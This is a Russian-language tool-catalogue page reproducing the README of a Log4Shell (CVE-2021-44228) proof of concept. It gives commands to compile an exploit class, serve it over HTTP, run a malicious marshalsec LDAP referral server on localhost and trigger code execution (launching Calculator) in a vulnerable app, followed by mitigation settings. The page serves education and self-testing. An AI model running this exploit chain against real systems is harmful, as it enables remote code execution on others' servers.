Skip to content
KitploitKITPLOIT
ИнструментыЭксплойтыБлог
Log in
Отправить
ИнструментыЭксплойтыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2021-44228-PoC — CVE-2021-44228 (Log4Shell) проверка концепции | Kitploit
Инструменты/GitHubGitHub/sunnyvale-it/cve-2021-44228-poc
Генерация полезной нагрузкиАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеОбучение и Образование
GitHubsunnyvale-it/cve-2021-44228-poc

CVE-2021-44228-PoC

CVE-2021-44228 (Log4Shell) проверка концепции

Репозиторий
8554 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2021-44228 (Log4Shell) Доказательство концепции

Функции JNDI в Apache Log4j2 <=2.14.1, используемые в конфигурации, журнальных сообщениях и параметрах, не защищают от контролируемых атакующим конечных точек LDAP и других связанных с JNDI конечных точек. Атакующий, который может контролировать журнальные сообщения или параметры журнальных сообщений, может выполнить произвольный код, загруженный с LDAP-серверов, когда включена подстановка значений в сообщениях (message lookup substitution).

Чтобы помочь клиентам понять, как работает эта уязвимость, мы подготовили этот репозиторий с простым, но рабочим Proof of Concept.

Предварительные требования

Убедитесь, что локально установлены:

  • Git
  • JDK 11
  • Maven
  • Python

В настоящее время произвольный код запускает приложение Calculator в macOS или Windows, поэтому данный PoC поддерживает только эти две операционные системы.

Отказ от ответственности

Вся информация и код предоставляются исключительно в образовательных целях и/или для проверки собственных систем на наличие этой уязвимости.

Техника атаки

Этот PoC повторяет описанное на картинке ниже (авторы: GovCERT.ch), за исключением уязвимого сервера, который для простоты представляет собой простой Java-класс. Важно понимать, что данная уязвимость может быть вызвана различными способами; описанный ниже — лишь один из них.

Как запустить PoC

Клонируйте этот репозиторий

terminal1 $ git clone https://github.com/sunnyvale-it/CVE-2021-44228-PoC.git

Скомпилируйте эксплойт (с помощью JDK 11)

terminal1 $ javac Exploit.java

Запустите HTTP-сервер для раздачи эксплойта

terminal1 $ python -m SimpleHTTPServer 8888 --directory .

Запустите вредоносный LDAPRefServer (благодарность https://github.com/mbechler/marshalsec)

terminal2 $ java -cp tools/marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://127.0.0.1:8888/#Exploit"

Запустите уязвимое приложение (содержащее log4j 2.14.1)

terminal3 $ mvn package && mvn exec:exec

Если всё прошло успешно, должно появиться приложение Calculator (выполнение произвольного кода)

Быстрые меры по смягчению (работают для версий Log4J с 2.10.0 по 2.14.1)

Установите переменную окружения LOG4J_FORMAT_MSG_NO_LOOKUPS в значение true

terminal3 $ export LOG4J_FORMAT_MSG_NO_LOOKUPS=true 
terminal3 $ mvn package && mvn exec:exec

В этом случае Calculator больше не должен появляться

Запустите приложение с системным свойством log4j2.formatMsgNoLookups, установленным в true

terminal3 $ mvn package && mvn exec:exec -Dlog4j2.formatMsgNoLookups=true

В этом случае Calculator больше не должен появляться

Скачать инструмент